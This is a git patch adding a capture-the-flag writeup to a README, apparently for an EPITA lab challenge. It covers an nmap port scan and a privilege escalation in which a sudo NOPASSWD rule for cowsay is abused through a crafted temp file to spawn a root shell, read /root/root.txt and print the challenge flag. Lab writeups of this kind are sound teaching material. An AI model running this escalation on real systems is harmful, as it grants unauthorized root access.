From dc7b75ef4bceed2b5cc4f72b062be9ae2c909582 Mon Sep 17 00:00:00 2001
From: david <david.cozariuc@epita.fr>
Date: Wed, 17 Sep 2025 13:36:06 +0200
Subject: [PATCH]  * added temp writeup

---
 README.md | 42 ++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 40 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 597d197..5356867 100644
--- a/README.md
+++ b/README.md
@@ -7,8 +7,46 @@
 
 ## Writeup
 
-
-
+### Enum
+
+Scan the IP using nmap for open ports
+
+```
+nmap -p- ip
+```
+
+The port 22 and 31337 are open.
+
+We find that there is a web service on port 31337.
+
+### Foothold
+
+...
+
+### Privesc
+
+We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password.
+
+```
+User l33t may run the following commands on srv1prod:
+    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
+```
+
+Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.
+
+[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)
+
+```
+TF=$(mktemp)
+echo 'exec "/bin/sh";' >$TF
+sudo cowsay -f $TF x
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# cat /root/root.txt
+epita{th3-sup3r-c0ws4y}
+```
+
+Solved !